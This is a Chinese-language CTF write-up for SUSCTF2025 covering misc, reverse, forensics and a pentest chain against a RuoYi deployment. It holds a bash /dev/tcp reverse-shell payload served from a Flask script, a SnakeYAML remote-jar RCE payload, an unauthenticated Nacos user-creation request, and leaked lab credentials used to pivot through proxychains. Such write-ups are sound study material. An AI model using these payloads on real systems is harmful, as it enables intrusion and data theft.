{"id":390,"date":"2025-10-09T10:58:46","date_gmt":"2025-10-09T02:58:46","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=390"},"modified":"2025-10-09T11:11:11","modified_gmt":"2025-10-09T03:11:11","slug":"susctf2025-%e4%b8%80%e7%82%b9%e7%82%b9wp","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/390","title":{"rendered":"SUSCTF2025 \u4e00\u70b9\u70b9WP"},"content":{"rendered":"
\n

\u563b\u563b<\/p>\n<\/blockquote>\n

\"\"<\/p>\n

Misc<\/h2>\n

Questionnaire<\/h3>\n

\u76f4\u63a5\u586b\uff0c\u6700\u540e\u62bd\u5956\u91cc\u9762\u624d\u6709flag<\/p>\n

curlbash<\/h3>\n

\u975e\u9884\u671f<\/p>\n

\u968f\u673a\u6570\u53ef\u4ee5\u53d6\u52300\uff0c\u76f4\u63a5\u53cd\u590d\u8fde\u63a5\u7206\u7834\u5c31\u597d\u4e86\uff0c\u81ea\u5df1vps\u4e0a\u90e8\u7f72\u4e00\u4e2a\u53cd\u5f39shell\u7684\u811a\u672c\u4e00\u76f4\u7b49\u5c31\u597d<\/p>\n

from pwn import *\nimport requests\n\nwhile 1:\n    r = remote('106.14.191.23', 51240)\n    r.recvuntil("Your script: ")\n    r.sendline('http:\/\/xx.xx.xx.xx:xxxx\/1.txt')\n\n    if ("[Round 0 CURLBASH]" in r.recvline().decode()):\n        break\n\n    r.close()<\/code><\/pre>\n
curlbash-revenge<\/h3>\n
\u4f9d\u65e7\u975e\u9884\u671f<\/p>\n
\u624b\u52a8\u6d4b\u4e86\u4e00\u4f1a\u53d1\u73b0\u968f\u673a\u6570\u76f8\u5bf9\u6bd4\u8f83\u5927\u4e86\uff0c\u7ee7\u7eed\u7206\u7834\uff0c\u8bbe\u7f6e\u76ee\u6807\u968f\u673a\u6570\u4e3a10\uff0c\u8fd0\u6c14\u4e0d\u9519\u4e00\u4f1a\u5c31\u7b49\u5230\u4e86<\/p>\n
vps\u4e0a\u90e8\u7f72\u8fd9\u4e2a<\/p>\n
from flask import Flask, request\n\napp = Flask(__name__)\n\nglobal num\n\nnum = 0\n\n@app.route("\/")\ndef index():\n    global num\n    ua = request.headers.get("User-Agent", "")\n    if ua.startswith("python-requests"):\n        return "echo hello"\n    else:\n        print(ua)\n        if (num < 10):\n            num += 1\n            return "echo hello"\n        if (num == 10):\n            print("end")\n        return 'bash -c "bash -i >& \/dev\/tcp\/xx.xx.xx.xx\/xxxx 0>&1"'\n\n@app.route("\/reset")\ndef reset():\n    global num\n    num = 0\n    return "reset done"\n\nif __name__ == "__main__":\n    app.run(host="0.0.0.0", port=8080)<\/code><\/pre>\n
\u672c\u5730\u4e00\u76f4\u8fde\u5c31\u597d\u4e86\uff0c\u5982\u679c\u968f\u673a\u6570\u5927\u4e8e10\u5219\u65ad\u5f00\u5e76\u8bf7\u6c42\/reset\u91cd\u7f6e\u8ba1\u6570\u5668<\/p>\n
from pwn import *\nimport requests\n\nwhile 1:\n    r = remote('106.14.191.23', 51240)\n    r.recvuntil("Your script: ")\n    r.sendline('http:\/\/xx.xx.xx.xx:xxxx')\n\n    for _ in range(10):\n        r.recvline()\n        r.recvline()\n    res = r.recvline().decode()\n    print(res)\n    if (res[:10] == "[Round 10]"):\n        r.close()\n        requests.get("http:\/\/xx.xx.xx.xx:xxxx\/reset")\n        print("Reset completed")\n    else:\n        r.interactive()\n<\/code><\/pre>\n
easyjail<\/h3>\n
vps\u4e0a\u90e8\u7f72\u8fd9\u4e2a\u5373\u53ef<\/p>\n
env -i cat \/flag<\/code><\/pre>\n
eat-mian<\/h3>\n
\u7528##\u62fc\u63a5\u5b57\u7b26\u7ed5\u8fc7\u68c0\u67e5\u5373\u53ef<\/p>\n
#define eat i##n##t\n#define mian m##a##i##n\n#define preatf p##r##i##n##t##f<\/code><\/pre>\n
mosaic<\/h3>\n
\u89c2\u5bdf\u53d1\u73b0\u4e24\u4e2apng\u90fd\u662fapng\u683c\u5f0f\uff0cflag\u6709225\u5e27\uff0cnoflag\u5219\u6709226\u5e27\uff0c\u5e76\u4e14noflag\u53ea\u6709\u7b2c\u4e00\u5f20\u662f\u6e05\u6670\u7684<\/p>\n
\u7528\u8fd9\u4e2a\u811a\u672c\u5148\u5206\u79bb\u51fa\u6240\u6709png\u56fe\u7247<\/p>\n
import os\nfrom PIL import Image\nimport argparse\n\ndef extract_apng_frames_pillow(input_file, output_dir=None):\n    """\n    \u4f7f\u7528Pillow\u5e93\u63d0\u53d6APNG\u5e27\n    """\n    try:\n        # \u6253\u5f00APNG\u6587\u4ef6\n        with Image.open(input_file) as img:\n            print(f"APNG\u4fe1\u606f: \u683c\u5f0f={img.format}, \u6a21\u5f0f={img.mode}, \u5e27\u6570={img.n_frames}")\n\n            # \u521b\u5efa\u8f93\u51fa\u76ee\u5f55\n            if output_dir is None:\n                output_dir = os.path.splitext(input_file)[0] + "_frames"\n            os.makedirs(output_dir, exist_ok=True)\n\n            # \u63d0\u53d6\u6bcf\u4e00\u5e27\n            for frame in range(img.n_frames):\n                img.seek(frame)\n\n                # \u4fdd\u5b58\u5e27\n                output_path = os.path.join(\n                    output_dir, f"frame_{frame:03d}.png")\n                img.save(output_path, "PNG")\n                print(f"\u5df2\u4fdd\u5b58: {output_path}")\n\n            print(f"\u6210\u529f\u63d0\u53d6 {img.n_frames} \u5e27\u5230\u76ee\u5f55: {output_dir}")\n\n    except Exception as e:\n        print(f"\u9519\u8bef: {e}")\n\nif __name__ == "__main__":\n    parser = argparse.ArgumentParser(description='\u63d0\u53d6APNG\u6587\u4ef6\u7684\u6240\u6709\u5e27')\n    parser.add_argument('input_file', help='\u8f93\u5165\u7684APNG\u6587\u4ef6\u8def\u5f84')\n    parser.add_argument('-o', '--output', help='\u8f93\u51fa\u76ee\u5f55\u8def\u5f84')\n\n    args = parser.parse_args()\n\n    extract_apng_frames_pillow(args.input_file, args.output)<\/code><\/pre>\n
\u5173\u4e8e\u9a6c\u8d5b\u514b\u65b9\u9762\uff0c\u653e\u5927\u89c2\u5bdf\u53d1\u73b0\u6bcf\u4e00\u4e2a\u8272\u5757\u90fd\u662f15x15\u7684\uff0c\u5e76\u4e14\u4f1a\u79fb\u52a8\uff0c\u6240\u4ee5\u6839\u636e\u89c4\u5f8b\u76f2\u731c\u9a6c\u8d5b\u514b\u7b97\u6cd5\u662f15x15rgb\u53d6\u5e73\u5747\u503c\uff0c\u5e76\u4e14\u5de6\u4e0a\u89d2\u50cf\u7d20\u4f1a\u4f9d\u7167\u5148\u5de6\u53f3\u540e\u4e0a\u4e0b\u7684\u89c4\u5f8b\u79fb\u52a8\uff0c\u4e8e\u662f\u5c31\u53ef\u4ee5\u60f3\u5230\u5982\u679c\u6309\u7167\u5148\u5de6\u53f3\u540e\u4e0a\u4e0b\u7684\u65b9\u5f0f\u626b\u63cf\u6240\u6709\u50cf\u7d20\uff0c\u76f4\u5230flag\u548cnoflag\u5728\u8fd9\u4e2a15x15\u4e0a\u51fa\u73b0\u5dee\u5f02\u5c31\u77e5\u9053\u4e86\u5f53\u524d15x15\u5185\u53f3\u4e0b\u89d2\u7684\u50cf\u7d20\u662f\u6c34\u5370\u50cf\u7d20\uff0c\u5e76\u4e14\u6839\u636e\u539f\u56fe\u8fd8\u53ef\u4ee5\u77e5\u9053\u8fd9\u4e2a\u6c34\u5370\u50cf\u7d20\u7684rgb\u503c\uff0c\u5c31\u8fd9\u6837\u5c31\u53ef\u4ee5\u6062\u590d\u5168\u56fe\uff0c\u4f46\u662f\u6211\u5199\u7684\u811a\u672c\u4f3c\u4e4e\u6709\u95ee\u9898\u6062\u590d\u4e0d\u5bf9\uff0c\u6700\u7ec8\u9009\u62e9\u4e0e\u539f\u56fe\u6bd4\u8f83\uff0c\u5e76\u4e14\u968f\u4fbf\u5904\u7406\u4e86\u4e00\u4e0b\u8bef\u5dee\uff0c\u4e5f\u57fa\u672c\u6062\u590d\u4e86\u6c34\u5370<\/p>\n
from PIL import Image\nfrom tqdm import trange\nimport numpy as np\n\ndef get_avg_flag(image, x, y):\n    return np.array(image.getpixel((x, y)))\n\ndef get_avg_noflag(image, x, y):\n    chunk = image.crop((x, y, x+15, y+15))\n    pixels = np.array(chunk)\n    return np.array([np.round(np.sum(pixels[:, :, 0])\/225), np.round(np.sum(pixels[:, :, 1])\/225), np.round(np.sum(pixels[:, :, 2])\/225)])\n\n# imgout = Image.new('RGB', (972, 601))\n\npixel_diff = np.zeros((601, 972, 3), dtype=int)\n\noriimg = Image.open('.\/noflag\/frame_000.png')\noriimg2 = Image.open('.\/noflag\/frame_000.png')\n\nfor y in trange(146, 225):\n    for x in range(972 - 14):\n        frame = (x % 15)*15 + (y % 15)\n        imgflag = Image.open(f'.\/flag\/frame_{frame:03}.png')\n        # imgnoflag = Image.open(f'.\/noflag\/frame_{(frame+1):03}.png')\n        flagnum = get_avg_flag(imgflag, x, y)\n        noflagnum = get_avg_noflag(oriimg, x, y)\n        if (flagnum != noflagnum).any():\n            diff = np.array(flagnum - noflagnum, dtype=int)\n            ori_col = oriimg.getpixel((x+14, y+14))\n            oriimg.putpixel(\n                (x+14, y+14), (ori_col[0]+diff[0]*225, ori_col[1]+diff[1]*225, ori_col[2]+diff[2]*225))\n            for d in range(3):\n                if (diff[d] > 1):\n                    diff[d] = 1\n                elif (diff[d] < -1):\n                    diff[d] = -1\n            oriimg2.putpixel(\n                (x+14, y+14), (ori_col[0]+diff[0]*225, ori_col[1]+diff[1]*225, ori_col[2]+diff[2]*225))\n\noriimg2.save('out1.png')<\/code><\/pre>\n
\u8fd9\u4e2a\u811a\u672c\u6062\u590d\u51fa\u6765\u957f\u8fd9\u6837<\/p>\n
\"\"<\/p>\n
\u6839\u636eflag\u7684hash\u503c\uff0c\u7b80\u5355\u7206\u7834\u4e00\u4e0b\u5373\u53ef<\/p>\n
import hashlib\n\nflag = "susctf{91d1650f-507b-45c7-996e-733517dd7979}"\ntarget_sha256 = "75ac06efd32a7c4136204bb552d2ee82416a3843f505a3f6cc61508639297024"\n\nalterna_7th = "023689"\nalterna_13th = "023689"\nalterna_17th = "023689"\nalterna_23th = "ace"\nalterna_27th = "023689"\nalterna_29th = "ace"\nalterna_40th = "023689"\nalterna_42th = "023689"\n\ndef sha256(s):\n    return hashlib.sha256(s.encode()).hexdigest()\n\nfor a in alterna_7th:\n    for b in alterna_13th:\n        for c in alterna_17th:\n            for d in alterna_27th:\n                for e in alterna_40th:\n                    for f in alterna_23th:\n                        for g in alterna_29th:\n                            for h in alterna_42th:\n                                candidate = f"susctf{{{a}4d165{b}f-5{c}7b-45{f}7-9{d}6{g}-733517dd7{e}7{h}}}"\n                                if sha256(candidate) == target_sha256:\n                                    print("Found flag:", candidate)\n                                    break<\/code><\/pre>\n
\u6700\u7ec8flag<\/p>\n
Found flag: susctf{84d1650f-597b-45c7-926e-733517dd7079}<\/code><\/pre>\n
pcap<\/h3>\n
binwalk\u4e00\u4e0b\u53d1\u73b0\u6709\u4e00\u4e2azip\uff0c\u6d41\u91cf\u91cc\u641c\u7d22504b0304\u627e\u5230\u5728\u6d41393\u91cc\uff0c\u63d0\u53d6\u51fa\u6765\u91cc\u9762\u6709\u4e00\u4e2atask.pcap\uff0crtp\u534f\u8bae\uff0c\u89c2\u5bdf\u4ed6\u7684data\u683c\u5f0f\u53d1\u73b0\u662fudp\u7684data\u91cc\u53c8\u5957\u4e86\u4e00\u4e2aip\u6570\u636e\u5305\uff0c\u8fd9\u4e2aip\u6570\u636e\u5305\u91cc\u9762\u624d\u662frtp\u534f\u8bae\u7684\u6570\u636e\uff0c\u4e8e\u662f\u5168\u90e8\u63d0\u53d6\u51fa\u6765<\/p>\n
tshark -r task.pcap -Y "udp.srcport==50920 and udp.dstport==1234" -T fields -e data.data | sed 's\/:\/\/g' > 1.txt<\/code><\/pre>\n
\u518d\u5199\u811a\u672c\u63d0\u53d6rtp\u6570\u636e<\/p>\n
f = open("1.txt", "r").readlines()\ncnt = 0\ndata = ""\nwith open("rtp_data.txt", "w") as out:\n    for i in f:\n        if (cnt == 0):\n            data = bytes.fromhex(i.strip())[50:]\n            cnt += 1\n        else:\n            data += bytes.fromhex(i.strip())[42:]\n            cnt = 0\n            out.write(data.hex() + "\\n")<\/code><\/pre>\n
\u7136\u540e\u8bd5\u7740\u91cd\u653e\u4e86\u4e00\u4e0b\u6ca1\u6210\u529f\uff0c\u4e8e\u662f\u76f4\u63a5\u63d0\u53d6\u7eaf\u51c0\u97f3\u9891\u6570\u636e<\/p>\n
f = open("rtp_data.txt", "r").readlines()\n\nwith open("audio.pcmu", "wb") as f2:\n    for line in f:\n        data = bytes.fromhex(line.strip()[24:])\n        f2.write(data)<\/code><\/pre>\n
\u7136\u540e\u76f4\u63a5ffmpeg\u8f6c\u6210wav<\/p>\n
ffmpeg -f mulaw -ar 48000 -ac 1 -i audio.pcmu out.wav<\/code><\/pre>\n
\u542c\u8d77\u6765\u662f\u67d0\u79cd\u4fe1\u53f7\uff0c\u5f00\u5934\u548c\u7ed3\u5c3e\u5404\u6709\u51e0\u4e0b\u54cd\u58f0\u5e94\u8be5\u6807\u8bb0\u7740\u5f00\u59cb\u548c\u7ed3\u675f<\/p>\n
\u8fd9\u65f6\u53c8\u60f3\u8d77\u6765task.pcap\u5c3e\u90e8\u8fd8\u6709\u51e0\u6761\u5173\u4e8enoaa_stream\u7684\u6d41\u91cf\uff0c\u641c\u7d22\u53d1\u73b0noaa\u8fd8\u771f\u662f\u4e00\u79cd\u4fe1\u53f7\uff0cgithub\u4e0a\u627e\u4e86\u4e2a\u89e3\u6790<\/a><\/p>\n
\u5148resample.py\u518dapt.py\u5373\u53ef\u83b7\u53d6flag\u56fe\u7247<\/p>\n
\"\"<\/p>\n
signin<\/h3>\n
\u627e\u4e86\u4e2aai2svg\u7684\u7f51\u7ad9\uff0c\u8f6c\u51fa\u6765\u53d1\u73b0\u91cc\u9762\u6709\u5f88\u591abase64\u683c\u5f0f\u7684png\u56fe\u7247\uff0c\u5168\u63d0\u53d6\u51fa\u6765\u5c31\u80fd\u627e\u5230susctf\u7684\u90a3\u5f20<\/p>\n
\"\"<\/p>\n
Reverse<\/h2>\n
ezsignin<\/h3>\n
idamcp\u4f1f\u5927\u65e0\u9700\u591a\u8a00\uff0c\u76f4\u63a5\u7ed9\u6211\u505a\u51fa\u6765\u4e86<\/p>\n
\u8fd9\u662fai\u7ed9\u7684\u811a\u672c<\/p>\n
#!\/usr\/bin\/env python3\n\n# \u4eceIDA\u5206\u6790\u4e2d\u63d0\u53d6\u7684\u6570\u636e\nimport base64\nbinary_string = "E1110000010000010001110001000001111O"\nbase64_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/"\nbase58_alphabet = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"\nencrypted_data = bytes([\n    0x32, 0x77, 0x48, 0x46, 0x77, 0x36, 0x58, 0x52, 0x51, 0x46, 0x4a, 0x65, 0x78, 0x77, 0x59, 0x63,\n    0x69, 0x7a, 0x57, 0x46, 0x4a, 0x56, 0x55, 0x38, 0x37, 0x47, 0x6e, 0x50, 0x50, 0x62, 0x75, 0x52,\n    0x5a, 0x46, 0x39, 0x39, 0x74, 0x38, 0x38, 0x38, 0x34, 0x53, 0x78, 0x54, 0x65, 0x52, 0x70, 0x74,\n    0x67, 0x76, 0x41, 0x6d, 0x66, 0x7a, 0x64, 0x71, 0x6d, 0x45, 0x39, 0x73, 0x6b, 0x43, 0x53, 0x52,\n    0x62, 0x45, 0x4d, 0x55, 0x63, 0x38, 0x72, 0x35, 0x57, 0x63, 0x47, 0x51, 0x34, 0x61, 0x71, 0x38,\n    0x67, 0x4a, 0x51, 0x32, 0x66, 0x70, 0x55, 0x51, 0x67, 0x69, 0x69, 0x4e, 0x76, 0x6b, 0x45, 0x51,\n    0x58, 0x4c, 0x34, 0x47, 0x6f, 0x51, 0x35, 0x72, 0x42, 0x5a, 0x66, 0x65, 0x6a, 0x59, 0x46, 0x74,\n    0x45, 0x70, 0x54, 0x41, 0x35, 0x78, 0x31, 0x6b, 0x79, 0x62, 0x74, 0x65, 0x6e, 0x65, 0x41, 0x75,\n    0x45, 0x43, 0x71, 0x70, 0x33, 0x75, 0x4c, 0x43, 0x44, 0x6e, 0x75, 0x55, 0x34, 0x47, 0x77, 0x44,\n    0x31, 0x6b, 0x4b, 0x65, 0x74, 0x38, 0x42, 0x6d, 0x71, 0x62, 0x34, 0x65, 0x69, 0x64, 0x50, 0x57,\n    0x45, 0x63, 0x72, 0x36, 0x62, 0x53, 0x4e, 0x4e, 0x55, 0x33, 0x77, 0x72, 0x35, 0x78, 0x78, 0x74,\n    0x48, 0x70, 0x63, 0x34, 0x33, 0x54, 0x79, 0x48, 0x4d, 0x53, 0x4b, 0x67, 0x67, 0x42, 0x52, 0x5a,\n    0x72, 0x50, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x20, 0x65, 0x6e, 0x74, 0x65, 0x72, 0x20, 0x74, 0x68,\n    0x65, 0x20, 0x73, 0x74, 0x65, 0x70, 0x73, 0x3a, 0x20, 0x0\n])\n\nprint("=== Crackme Analysis ===")\nprint(f"Binary string: {binary_string}")\nprint(f"Base64 alphabet: {base64_alphabet}")\nprint(f"Base58 alphabet: {base58_alphabet}")\nprint(f"Encrypted data length: {len(encrypted_data)} bytes")\nprint(f"Encrypted data (hex): {encrypted_data.hex()}")\nprint(\n    f"Encrypted data (string): {encrypted_data.decode('ascii', errors='ignore')}")\n\n# \u5206\u6790\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32\nprint("\\n=== Binary String Analysis ===")\n# \u79fb\u9664\u9996\u5c3e\u7684E\u548cO\u5b57\u7b26\uff0c\u5b83\u4eec\u53ef\u80fd\u662f\u5206\u9694\u7b26\nbinary_data = binary_string[1:-1]  # \u79fb\u9664E\u548cO\nprint(f"Binary data: {binary_data}")\nprint(f"Binary length: {len(binary_data)} bits")\n\n# \u5c1d\u8bd5\u5c06\u4e8c\u8fdb\u5236\u8f6c\u6362\u4e3aASCII\ntry:\n    # \u5c06\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32\u5206\u7ec4\u4e3a8\u4f4d\u5b57\u8282\n    binary_bytes = [binary_data[i:i+8] for i in range(0, len(binary_data), 8)]\n    ascii_result = ''.join([chr(int(byte, 2))\n                           for byte in binary_bytes if len(byte) == 8])\n    print(f"Binary to ASCII: {ascii_result}")\nexcept:\n    print("Binary to ASCII conversion failed")\n\n# \u5c1d\u8bd5XOR\u89e3\u5bc6\nprint("\\n=== XOR Decryption Attempts ===")\n# \u5c1d\u8bd5\u4f7f\u75280x66\u4f5c\u4e3a\u5bc6\u94a5\uff08\u4ece\u51fd\u6570\u5206\u6790\u4e2d\u5f97\u77e5\uff09\nxor_key_0x66 = bytes([b ^ 0x66 for b in encrypted_data])\nprint(f"XOR with 0x66: {xor_key_0x66.decode('ascii', errors='ignore')}")\n\n# \u5c1d\u8bd5\u4f7f\u7528"YourKey"\u4f5c\u4e3a\u5bc6\u94a5\nyourkey = b"YourKey"\nxor_key_yourkey = bytes([encrypted_data[i] ^ yourkey[i % len(yourkey)]\n                        for i in range(len(encrypted_data))])\nprint(\n    f"XOR with 'YourKey': {xor_key_yourkey.decode('ascii', errors='ignore')}")\n\n# \u5c1d\u8bd5Base64\u89e3\u7801\nprint("\\n=== Base64 Decoding ===")\ntry:\n    base64_decoded = base64.b64decode(encrypted_data)\n    print(f"Base64 decoded: {base64_decoded}")\nexcept:\n    print("Base64 decoding failed")\n\n# \u5c1d\u8bd5Base58\u89e3\u7801\nprint("\\n=== Base58 Decoding ===")\n\ndef base58_decode(s, alphabet=base58_alphabet):\n    result = 0\n    for char in s:\n        result = result * 58 + alphabet.index(char)\n    return result\n\ntry:\n    # \u53ea\u5c1d\u8bd5\u89e3\u7801\u770b\u8d77\u6765\u50cfBase58\u7684\u90e8\u5206\n    base58_part = encrypted_data[:50].decode('ascii', errors='ignore')\n    if all(c in base58_alphabet for c in base58_part):\n        base58_decoded = base58_decode(base58_part)\n        print(f"Base58 decoded (first part): {base58_decoded}")\n    else:\n        print("Data doesn't appear to be Base58 encoded")\nexcept Exception as e:\n    print(f"Base58 decoding failed: {e}")<\/code><\/pre>\n
\u8fd9\u4e2a\u811a\u672c\u6ca1\u6709\u83b7\u5f97flag\uff0c\u4f46\u662f\u6211\u770b\u4e86\u4e0bai\u601d\u8003\u7684\u8fc7\u7a0b\uff0c\u62ff\u91cc\u9762\u7684Encrypted data (string)\u89e3\u4e86\u51e0\u6b21base58\u518dxor\u4e860x66\u5c31\u505a\u51fa\u6765\u4e86<\/p>\n
\"\"<\/p>\n
Forensics<\/h2>\n
juicyfs<\/h3>\n
\u5148\u7b80\u5355\u6539\u4e86\u4e00\u4e0bjfs_setting\u5c31\u53ef\u4ee5\u6b63\u5e38\u6302\u8f7d\u548c\u5f00webdav\u4e86<\/p>\n
{"Name": "juicyfs", "UUID": "00000000-0000-0000-0000-000000000000", "Storage": "sqlite3", "Bucket": "\/Users\/zysgmzb\/Desktop\/SUSCTF\/juicefs\/juicyfs.db", "BlockSize": 1024, "Compression": "lz4", "EncryptAlgo": "aes256gcm-rsa", "TrashDays": 0, "MetaVersion": 1, "MinClientVersion": "0.0.0", "EnableACL": false}<\/code><\/pre>\n
\u7136\u540e\u89c2\u5bdf\u4e86\u4e00\u4e0bjfs_edge\u91cc\u6240\u6709\u6587\u4ef6\u7684\u540d\u79f0\uff0c\u53d1\u73b0\u4e86\u8fd9\u4e24\u4e2a<\/p>\n
vidvtvbvfdqc                                        will place the flag here...\nruoxkzseoper                                        have placed the flag here...<\/code><\/pre>\n
inode\u5206\u522b\u4e3a3323\u548c3325\uff0c\u518d\u53bbjfs_node\u91cc\u67e5\u770b\uff0c\u53d1\u73b0\u4e2d\u95f4\u8fd8\u6709\u4e2a3324\uff0c\u5e76\u4e14\u8fd9\u4e09\u4e2a\u6587\u4ef6\u7684parent\u90fd\u662f\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684inode\u4e3a3\u7684\u5730\u65b9\uff0c\u76f8\u5f53\u4e8e\u88ab\u9690\u85cf\u4e86\uff0c\u518d\u6839\u636ewill\u548chave\u7684\u65f6\u6001\uff0c\u731c\u6d4bflag\u5c31\u662f\u8fd9\u4e2ainode\u4e3a3324\u7684\u6587\u4ef6\uff0c\u4e8e\u662f\u76f4\u63a5\u628ajfs_edge\u91cc\u9762inode\u4e3a3323\u7684\u6539\u6210\u4e863324\uff0cparent\u6539\u6210\u4e862\uff0c\u518d\u5f00\u4e2awebdav\u5c31\u53ef\u4ee5\u83b7\u53d6\u52303324\u8fd9\u4e2a\u6587\u4ef6\u4e86<\/p>\n
juicefs webdav sqlite3:\/\/juicyfs.db 0.0.0.0:8080\n\nwget http:\/\/localhost:8080\/are%20these%20flags\/vidvtvbvfdqc%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20will%20place%20the%20flag%20here...<\/code><\/pre>\n
\u4e00\u5f00\u59cb\u4ee5\u4e3a\u5957\u4e86\u4e2a\u9006\u5411\u8ba9idamcp\u770b\u4e86\u534a\u5929\uff0c\u7ed3\u679c\u8fd0\u884c\u5c31\u51faflag\u4e86<\/p>\n
susctf{yOu_Ar3_ju1cef$_mAs7er!!1}<\/code><\/pre>\n
Pentest<\/h2>\n
pen4ruo1-1<\/h3>\n
\u5f31\u53e3\u4ee4ruoyi:admin123\u8fdb\u540e\u53f0\uff0c\u8ba1\u5212\u4efb\u52a1rce\uff0c\u7528h\\x74tp\u53ef\u4ee5\u7ed5\uff0c\u8fd9\u4e2apayload\u53ea\u80fd\u65b0\u5efa\u8ba1\u5212\u4efb\u52a1\u7684\u65f6\u5019\u6210\u529f\uff0c\u540e\u9762\u518d\u4fee\u6539\u4f1a\u63d0\u793a\u6709\u9519\u8bef<\/p>\n
\u76f4\u63a5\u7167\u7740\u8fd9\u7bc7\u535a\u5ba2<\/a>\u505a\u4e00\u904d<\/p>\n
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["h\\x74tp:\/\/xx.xx.xx.xx:xxxx\/yaml-payload.jar"]]]]')<\/code><\/pre>\n
flag\u5728\u6839\u76ee\u5f55<\/p>\n
\"\"<\/p>\n
pen4ruo1-2<\/h3>\n
\u5185\u7f51<\/p>\n
.\/fscan -h 172.31.11.0\/24\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   <    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.2\nstart infoscan\n(icmp) Target 172.31.11.1     is alive\n(icmp) Target 172.31.11.2     is alive\n(icmp) Target 172.31.11.3     is alive\n(icmp) Target 172.31.11.4     is alive\n(icmp) Target 172.31.11.5     is alive\n(icmp) Target 172.31.11.6     is alive\n(icmp) Target 172.31.11.7     is alive\n(icmp) Target 172.31.11.8     is alive\n(icmp) Target 172.31.11.9     is alive\n(icmp) Target 172.31.11.10    is alive\n[*] Icmp alive hosts len is: 10\n172.31.11.1:80 open\n172.31.11.1:7890 open\n172.31.11.8:80 open\n172.31.11.1:8080 open\n172.31.11.2:6379 open\n172.31.11.3:9001 open\n172.31.11.5:8848 open\n172.31.11.3:9000 open\n172.31.11.6:8080 open\n172.31.11.1:10250 open\n172.31.11.1:22 open\n172.31.11.4:3306 open\n172.31.11.10:9200 open\n172.31.11.1:443 open\n[*] alive ports len is: 14\nstart vulscan\n[*] WebTitle: http:\/\/172.31.11.8        code:200 len:12316  title:\u4f01\u4e1a\u7ba1\u7406\u5e73\u53f0\n[*] WebTitle: http:\/\/172.31.11.1        code:404 len:0      title:None\n[*] WebTitle: http:\/\/172.31.11.3:9001   code:200 len:1309   title:MinIO Console\n[*] WebTitle: http:\/\/172.31.11.1:8080   code:400 len:0      title:None\n[*] WebTitle: http:\/\/172.31.11.1:7890   code:400 len:0      title:None\n[*] WebTitle: http:\/\/172.31.11.3:9000   code:307 len:59     title:None \u8df3\u8f6curl: http:\/\/172.31.11.3:9001\n[*] WebTitle: http:\/\/172.31.11.3:9001   code:200 len:1309   title:MinIO Console\n[*] WebTitle: https:\/\/172.31.11.1:10250 code:404 len:19     title:None\n[*] WebTitle: http:\/\/172.31.11.6:8080   code:200 len:34     title:None\n[*] WebTitle: http:\/\/172.31.11.5:8848   code:404 len:431    title:HTTP Status 404 \u2013 Not Found\n[*] WebTitle: http:\/\/172.31.11.10:9200  code:404 len:275    title:None\n[+] http:\/\/172.31.11.5:8848 poc-yaml-alibaba-nacos \n[+] http:\/\/172.31.11.6:8080 poc-yaml-springboot-env-unauth spring2\n[+] http:\/\/172.31.11.6:8080 poc-yaml-spring-actuator-heapdump-file \n[+] http:\/\/172.31.11.10:9200 poc-yaml-spring-actuator-heapdump-file \n[+] http:\/\/172.31.11.10:9200 poc-yaml-springboot-env-unauth spring2\n\u5df2\u5b8c\u6210 15\/15\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 18.698395244s<\/code><\/pre>\n
\u6709\u4e2anacos\u53ef\u4ee5\u672a\u6388\u6743\u6dfb\u52a0\u7528\u6237<\/p>\n
curl -X POST 'http:\/\/172.31.11.5:8848\/nacos\/v1\/auth\/users?username=zysgmzb&password=zysgmzb' -H 'User-Agent: Nacos-Server'<\/code><\/pre>\n
\u91cc\u9762\u6709\u4e00\u5806\u914d\u7f6e\u6587\u4ef6<\/p>\n
datasource:\n          # \u4e3b\u5e93\u6570\u636e\u6e90\n          master:\n            driver-class-name: com.mysql.cj.jdbc.Driver\n            url: jdbc:mysql:\/\/ruoyi-mysql:3306\/ry_cloud?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8\n            username: root\n            password: susctf@2025!@#(mysql)\n\nspring:\n  redis:\n    host: ruoyi-redis\n    port: 6379\n    password: susctf@2025!@#(redis)\n\n# Minio\u914d\u7f6e\nminio:\n  url: http:\/\/ruoyi-minio:9000\n  accessKey: sus\n  secretKey: susctf@2025-minio\n  bucketName: susctf<\/code><\/pre>\n
\u62ff\u7740\u8fd9\u4e2a\u6302\u4ee3\u7406\u53bb\u8fdemysql<\/p>\n
proxychains4 -f \/etc\/proxychains4.conf mysql -h ruoyi-mysql -u root -p<\/code><\/pre>\n
flag\u5728ry_cloud\u91cc<\/p>\n
\"\"<\/p>\n
pen4ruo1-3<\/h3>\n
\u7528accesskey\u4f5c\u4e3a\u7528\u6237\u540d\uff0csecretkey\u4f5c\u4e3a\u5bc6\u7801\u767b\u5f55minio\uff0c\u53d1\u73b0susctf\u4e0b\u670910000\u4e2a\u6587\u4ef6\uff0c\u8981\u627e\u91cc\u9762\u7684flag\uff0c\u95ee\u4e86\u4e0bai\u53ef\u4ee5\u7528mc<\/a><\/p>\n
\u7136\u540e\u5c31\u53ef\u4ee5\u5168\u4e0b\u5230\u672c\u5730<\/p>\n
proxychains4 -f \/etc\/proxychains4.conf .\/mc alias set susctf http:\/\/172.31.11.4:9000 sus susctf@2025-mini\n\nproxychains4 -f \/etc\/proxychains4.conf .\/mc cp --recursive susctf\/susctf\/ .\/flags\/<\/code><\/pre>\n
\u76f4\u63a5strings * | grep susctf\u5c31\u884c<\/p>\n
